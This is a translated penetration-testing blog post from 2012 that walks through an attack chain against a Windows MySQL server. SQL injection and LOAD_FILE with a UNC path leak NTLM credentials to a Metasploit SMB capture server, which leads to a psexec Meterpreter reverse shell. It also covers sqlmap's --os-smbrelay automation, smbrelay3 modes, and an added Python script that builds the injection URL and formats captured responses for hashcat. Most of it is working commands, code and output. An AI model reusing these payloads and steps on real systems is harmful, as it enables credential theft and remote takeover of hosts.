15 MSF Combined Exploitation: MySQL & SMBRelay Attack

Posted 2012-8-6 15:38:20

Now for the main part. If MySQL runs under a real user account such as Administrator (rather than the default Local System account, which sends no NTLM credentials when it connects to a remote SMB server, as sqlmap itself warns later in this post), this attack succeeds.


Now the pentest: we have an injection point, and the database user is root.

Let's check whether it can read files; root should be able to (FILE privilege).

Yes, it can read files (and look, the great hacker HELEL makes an appearance!).

Next, stand up a fake SMB server on our own machine. Note the default CHALLENGE: the module always sends the same fixed 8-byte challenge, which is what makes the captured responses easy to crack offline.


msf > use auxiliary/server/capture/smb
msf  auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

msf  auxiliary(smb) > exploit
[*] Auxiliary module execution completed

[*] Server started.
msf  auxiliary(smb) >
Then make the target read a file from our share: through the injection point, call LOAD_FILE() with a UNC path (\\attacker\share\file) pointing at the fake server. The MySQL service account authenticates to our SMB listener, and because the account is Administrator, we get its NTLM credentials.

^_^ We captured the NTLM challenge-response. Note that despite the LMHASH/NTHASH labels, these are NTLMv1 responses to the module's fixed challenge, not the password hashes themselves:

NTLMv1 Response Captured from 192.1.1.130:1162
USER:Administrator DOMAIN:DIS9TEAM-B39270 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:be55aab30bf2e1268f57f90887c0d68e2f85252cc731bb25
NTHASH:54b41c2204df7a9e1478f3cfa64bd9e250f57a764a0eef36
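The two mechanical steps above, as an added example that is not part of the original post: building the UNION/LOAD_FILE payload with correct MySQL backslash escaping (the UNC path needs every backslash doubled inside the string literal), and turning the capture module's output into a line that John's netntlm format or hashcat mode 5500 will accept. The column count (3), column position (1), share name and file name are assumptions for illustration; the capture text is the output shown above, embedded inline. The ESS check matters because when the LM response is a client nonce followed by 16 zero bytes, the effective challenge is no longer the module's fixed one.

```python
import re
from urllib.parse import quote

# Sample input: the capture module's output as printed in the post above.
CAPTURE_OUTPUT = """\
NTLMv1 Response Captured from 192.1.1.130:1162
USER:Administrator DOMAIN:DIS9TEAM-B39270 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:be55aab30bf2e1268f57f90887c0d68e2f85252cc731bb25
NTHASH:54b41c2204df7a9e1478f3cfa64bd9e250f57a764a0eef36
"""

# Default CHALLENGE of auxiliary/server/capture/smb (8 bytes, hex).
MSF_DEFAULT_CHALLENGE = "1122334455667788"


def mysql_string_literal(s: str) -> str:
    """Quote s as a MySQL single-quoted literal.

    MySQL treats backslash as an escape character inside string literals,
    so a UNC path \\host\share\f must be written '\\\\host\\share\\f'.
    """
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def unc_path(host: str, share: str, name: str) -> str:
    return f"\\\\{host}\\{share}\\{name}"


def load_file_union_payload(ncols: int, pos: int, host: str, share: str, name: str) -> str:
    """UNION SELECT payload whose column `pos` (1-based) calls LOAD_FILE() on a
    UNC path. ncols/pos come from the usual UNION column enumeration; the
    value returned does not matter, only the outbound SMB connection does."""
    cols = ["NULL"] * ncols
    cols[pos - 1] = f"LOAD_FILE({mysql_string_literal(unc_path(host, share, name))})"
    return "1 UNION SELECT " + ",".join(cols) + "-- -"


def injection_url(base: str, param: str, payload: str) -> str:
    """URL-encode the payload into a GET parameter (base/param are assumed)."""
    return f"{base}?{param}={quote(payload, safe='')}"


def parse_msf_capture(text: str) -> dict:
    """Pull user, domain and the two 24-byte responses out of the module output."""
    user = re.search(r"^USER:(\S+)", text, re.M).group(1)
    domain = re.search(r"DOMAIN:(\S+)", text).group(1)
    lm = re.search(r"^LMHASH:([0-9a-fA-F]+)", text, re.M).group(1).lower()
    nt = re.search(r"^NTHASH:([0-9a-fA-F]+)", text, re.M).group(1).lower()
    return {"user": user, "domain": domain, "lm_resp": lm, "nt_resp": nt}


def uses_ess(cap: dict) -> bool:
    """NTLM2 session security (ESS): LM response = 8-byte client nonce + 16 zero
    bytes. Then the effective challenge is MD5(server_chal || nonce)[:8], so the
    fixed-challenge shortcut (precomputed tables) does not apply."""
    return cap["lm_resp"][16:] == "0" * 32


def netntlmv1_hash_line(cap: dict, challenge_hex: str) -> str:
    """user::domain:LMresp:NTresp:challenge, the line format accepted by
    hashcat -m 5500 and John the Ripper's netntlm format."""
    for k in ("lm_resp", "nt_resp"):
        if len(cap[k]) != 48:
            raise ValueError(f"{k} must be 24 bytes (48 hex chars), got {len(cap[k])}")
    if len(challenge_hex) != 16:
        raise ValueError("challenge must be 8 bytes (16 hex chars)")
    return f"{cap['user']}::{cap['domain']}:{cap['lm_resp']}:{cap['nt_resp']}:{challenge_hex}"


if __name__ == "__main__":
    payload = load_file_union_payload(3, 1, "192.1.1.1", "share", "x.txt")
    print(injection_url("http://192.1.1.130/sql/index.php", "id", payload))
    cap = parse_msf_capture(CAPTURE_OUTPUT)
    print("ESS in use:", uses_ess(cap))
    print(netntlmv1_hash_line(cap, MSF_DEFAULT_CHALLENGE))
```

The formatted line is what you feed to the cracker; with the module's fixed challenge and no ESS, each DES key third of the NT response can also be attacked independently to recover the NT hash itself, which is why leaving CHALLENGE at its default is convenient for the attacker and worth alerting on from the defender's side.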


Next, Metasploit's exploit/windows/smb/psexec module, or Nessus's SMB shell, gets us a system-level shell. One caveat: a captured challenge-response cannot be replayed directly, so it has to be cracked first, either to the password (John's netntlm format, hashcat mode 5500) or, since the challenge is the module's fixed 1122334455667788, back to the NT hash itself, which psexec accepts as an LM:NT pair in SMBPass.
msf  exploit(psexec) > exploit

[*] Started reverse handler on 192.1.1.1:1111
[*] Connecting to the server...
[*] Authenticating to 192.1.1.130:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \HgLceCLd.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (wZdMvYRY - "MWrLYVvwSxdptGUwjxeJoQYxVEOvvSh")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \HgLceCLd.exe...
[*] Sending stage (752128 bytes) to 192.1.1.130
[*] Meterpreter session 1 opened (192.1.1.1:1111 -> 192.1.1.130:1168) at 2012-01-09 16:56:34 +0800
If the above feels like too much work, use sqlmap instead: its --os-smbrelay option chains the whole thing (injection, UNC LOAD_FILE, Metasploit smb_relay, payload) for you.
brk@Dis9Team:~/t/sqlmap$ sudo ./sqlmap.py -u "http://192.1.1.130/sql/index.php?id=1" --msf-path=/home/brk/t/msf3/ --os-smbrelay
[sudo] password for brk:

    sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 17:04:54

[17:04:54] [INFO] using '/home/brk/t/sqlmap/output/192.1.1.130/session' as session file
[17:04:54] [INFO] testing connection to the target url
[17:04:54] [INFO] testing if the url is stable, wait a few seconds
[17:04:55] [INFO] url is stable
---------------- omitted -------------
[17:05:06] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 22 HTTP(s) requests:
---
---

[17:05:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
[17:05:11] [WARNING] it is unlikely that this attack will be successful because by default MySQL on Windows runs as Local System which is not a real user, it does not send the NTLM session hash when connecting to a SMB service
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
> 1
which is the local address? [192.1.1.1]
which local port number do you want to use? [50803] 5588
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which SMB port do you want to use?
[1] 139/TCP
[2] 445/TCP (default)
> 2
[17:06:34] [INFO] running Metasploit Framework 3 console locally, please wait..

[*] Processing /home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt for ERB directives.
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> use windows/smb/smb_relay
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVHOST 192.1.1.1
SRVHOST => 192.1.1.1
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVPORT 445
SRVPORT => 445
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LPORT 5588
LPORT => 5588
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LHOST 192.1.1.1
LHOST => 192.1.1.1
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> exploit
[*] Exploit running as background job.
---------------------------------
[*] Started reverse handler on 192.1.1.1:5588
[*] Server started.
[*] Deleting \AaTNBUvw.exe...
[*] Sending Access Denied to 192.1.1.130:1204 DIS9TEAM-B39270\Administrator
[*] Sending stage (752128 bytes) to 192.1.1.130
[*] Meterpreter session 1 opened (192.1.1.1:5588 -> 192.1.1.130:1205) at 2012-01-09 17:06:51 +0800

Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32               192.1.1.1:5588 -> 192.1.1.130:1205
What if you are attacking from Windows? You can use the tool smbrelay3.exe, which offers five relay modes:

* HTTP to SMB: Negotiate authentication with an HTTP client and relay credentials to another SMB host.
* SMB to SMB: Negotiate authentication with an SMB computer and relay credentials to another Windows computer.
* IMAP to SMB: Negotiate authentication with an email IMAP client and relay credentials to another host.
* POP3 to SMB: Negotiate authentication with an email POP3 client and relay credentials to another host.
* SMTP to SMB: Negotiate authentication with an email SMTP client and relay credentials to an SMB computer.

You know what to do.


